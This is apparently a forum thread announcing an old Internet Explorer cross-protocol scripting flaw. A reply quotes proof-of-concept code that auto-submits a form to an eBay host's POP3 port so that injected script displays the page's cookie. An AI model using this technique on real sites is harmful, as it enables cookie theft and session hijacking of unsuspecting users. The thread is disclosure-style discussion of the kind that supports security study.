-
New IE vulnerability !!!
A malicious user can create a form which is submitted by the victim (automatically using Active Scripting or manually using Social Engineering). This form can cause a non-HTTP service to echo back JavaScript commands which in turn allow the malicious user to steal the cookie for that domain. There are more uses for this attack, other than just stealing cookies.
Read full article at www.xatrix.org
Exploit available.
-
Do you work for Xatrix? Oh well... Another good example of Microsoft.... If your using Windows switch to Linux... If you dont want to.... At least use Opera..... :p
BTW I like the code they used... Its amazing no one figured this out sooner...
Code:
<script>
window.open("http://www.ebay.com","w");
setTimeout("form1.submit()",300);
</script>
<form name="form1" method="post" action="http://thompson.ebay.com:110/" enctype="multipart/form-data">
<textarea name="eostest">
user <script>alert(document.cookie)</script>
quit
</textarea>
<input type="submit" value="Submit">
</form>